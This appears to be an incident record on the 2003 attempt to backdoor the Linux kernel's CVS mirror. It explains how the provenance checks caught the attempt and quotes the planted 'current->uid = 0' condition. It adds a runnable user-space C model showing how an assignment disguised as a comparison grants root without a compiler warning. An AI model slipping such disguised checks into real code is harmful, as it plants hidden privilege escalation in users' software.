Linux bk2cvs mirror received backdoor
An attacker attempted to insert a two-line backdoor into the Linux kernel's bk2cvs mirror by modifying kernel/exit.c outside the authoritative BitKeeper workflow.
Story
In November 2003, the Linux kernel was maintained in BitKeeper, with a separate CVS mirror available for developers who could not or would not use BitKeeper directly. An attacker modified the CVS-side kernel/exit.c history on kernel.bkbits.net instead of landing a real BitKeeper changeset. That distinction mattered: the poisoned revisions appeared in the mirror, but not in the authoritative development tree used for mainline integration.
The change was small enough to be read and large enough to matter. It lived in kernel/exit.c, in the wait path, and looked like an error check. The planted CVS revisions lacked normal BitKeeper logical-change backlinks, which made the source-control metadata as important as the C code.
The inserted code checked for options == (__WCLONE|__WALL), a flag combination no ordinary caller passes, and then evaluated current->uid = 0: a single = where a comparison == would be expected. That expression assigns 0 (root) to the calling process's uid and itself evaluates to false, so the visible error path (retval = -EINVAL) is never taken and the call otherwise behaves normally; a caller who knew the trigger simply came back as root. BitMover's conversion checks caught the fraud quickly because normal CVS mirror entries carried logical-change backlinks to BitKeeper changesets, while the planted revisions did not. The incident became an early, concrete example of why source-control provenance matters as much as code review.
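The planted condition, modelled in user space as an added example (this is not the kernel's code and is not taken from the page's sources). The struct task, the two wait4 stand-ins and the uid 1000 caller are assumptions made for the demonstration; the flag values are the ones the 2003 kernel headers defined. Running it shows why the backdoor was invisible at runtime: the assignment evaluates to zero, so the error branch never fires, yet the caller's uid is 0 afterwards. The parenthesised assignment is also exactly the form that keeps gcc's -Wparentheses warning quiet.

```c
/* Added example: a user-space model of the 2003 kernel/exit.c backdoor.
 * Not the kernel's code. struct task and the wait4 stand-ins are simplified
 * assumptions so that "=" versus "==" can be run and observed directly. */
#include <stdio.h>
#include <errno.h>

/* Flag values as defined in the 2003-era <linux/wait.h>. The combination
 * __WCLONE|__WALL is not something a normal wait4() caller passes, which
 * is what made it usable as a private trigger. */
#define __WALL   0x40000000
#define __WCLONE 0x80000000

/* Stand-in for the kernel's `current` task (assumption: only uid matters). */
struct task {
    unsigned int uid;
};

/* Planted form. "current->uid = 0" is an assignment, not a comparison: it
 * stores 0 (root) and evaluates to 0 (false), so retval = -EINVAL is never
 * reached and the call proceeds as if nothing happened. The extra
 * parentheses around the assignment suppress gcc -Wparentheses. */
static int wait4_backdoored(struct task *current, int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The comparison the line pretended to be: reject the bogus flag
 * combination when the caller is root, with no side effect on uid. */
static int wait4_checked(struct task *current, int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Call one wait4 variant as an unprivileged caller (constructed uid 1000)
 * and report the caller's uid afterwards. */
static unsigned int uid_after_call(int (*wait4_fn)(struct task *, int), int options)
{
    struct task t = { .uid = 1000 };
    wait4_fn(&t, options);
    return t.uid;
}

int main(void)
{
    printf("backdoored, ordinary options: uid %u\n",
           uid_after_call(wait4_backdoored, 0));
    printf("backdoored, trigger options : uid %u\n",
           uid_after_call(wait4_backdoored, __WCLONE|__WALL));
    printf("checked,    trigger options : uid %u\n",
           uid_after_call(wait4_checked, __WCLONE|__WALL));
    return 0;
}
```

Compile with `gcc -Wall` and note that no warning is emitted for the assignment inside the condition; the second line of output is the backdoor in action (uid 0 with a return value of 0, i.e. success), while the third shows the side-effect-free comparison leaving uid 1000 untouched.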
The attack failed because the mirror was not the source of truth. That is the important distinction for this record: the code change was malicious, but the project workflow still had an authoritative history that let maintainers separate a forged mirror revision from a real kernel change.
Affected Artifacts
- Observed: 2003-11-05
- Compromised Versions: Unknown
- Fixed: Not listed
Incident Context
- Motive: Unauthorized Access Control
- Cause: Compromised Infrastructure
- Transitive: No
Indicators
- file: kernel/exit.c
- code: current->uid = 0
- code: options == (__WCLONE|__WALL)
External References
- The Linux Backdoor Attempt of 2003 (blog.citp.princeton.edu)
- An attempt to backdoor the kernel (lwn.net)
- BK2CVS problem (lwn.net)
- LWN: Almost right (lwn.net)
- Phrack: Linux on-the-fly kernel patching without LKM (phrack.org)
Source record: oss/attacks/linux/meta.yaml